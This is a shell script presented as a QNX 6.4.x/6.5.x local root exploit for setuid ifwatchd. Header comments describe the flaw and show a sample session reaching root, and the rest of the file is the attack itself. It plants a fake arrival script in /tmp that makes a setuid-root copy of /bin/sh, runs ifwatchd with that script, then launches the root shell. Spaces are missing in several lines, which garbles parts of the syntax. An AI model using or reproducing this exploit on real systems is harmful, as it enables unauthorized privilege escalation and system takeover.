#!/bin/sh##QNX 6.4.x/6.5.x ifwatchd local root exploit by cenobyte 2013# <vincitamorpatriae@gmail.com>## - vulnerability description:# Setuid root ifwatchd watches for addresses added to or deleted from network# interfaces and calls up/down scripts for them. Any user can launch ifwatchd# and provide arbitrary up/down scripts. Unfortunately ifwatchd does not drop# privileges when executing user supplied scripts.## - vulnerable platforms:# QNX 6.5.0SP1# QNX 6.5.0# QNX 6.4.1## - exploit description:# This exploit creates a fake arrival-script which will be executed as root by# passing it to the -A parameter of /sbin/ifwatchd. The fake arrival-script# copies /bin/sh to /tmp/shell and makes it setuid root. Once the setuid shell# is in place ifwatchd will be killed to drop the user into the root shell.## - example:# $ uname -a# QNX localhost 6.5.0 2010/07/09-14:44:03EDT x86pc x86# $ id# uid=100(user) gid=100# $ ./qnx-ifwatchd.sh# QNX 6.4.x/6.5.x ifwatchd local root exploit by cenobyte 2013## [-] creating fake arrival-script# [-] executing ifwatchd, please wait# Killed# [-] now executing suid shell# # id# uid=100(user) gid=100 euid=0(root)PATH=/bin:/usr/bin:/sbin
if[!-x /sbin/ifwatchd ];thenecho"error: cannot execute /sbin/ifwatchd"exit1fiecho"QNX 6.4.x/6.5.x ifwatchd local root exploit by cenobyte 2013"echoecho"[-] creating fake arrival-script"cat<<_EOF_> /tmp/0
#!/bin/sh
PATH=/bin:/usr/bin
IFWPID=\$(ps-edaf|grep"ifwatchd -A"|awk'!/grep/ { print \$2 }')
cp /bin/sh /tmp/shell
chown root:root /tmp/shell
chmod 4755 /tmp/shell
rm -f /tmp/0
kill -9 \$IFWPID
exit 0
_EOF_chmod +x /tmp/0
echo"[-] executing ifwatchd, please wait"
ifwatchd -A /tmp/0 -v lo0 2>&1>/dev/null
echo"[-] now executing suid shell"
/tmp/shell
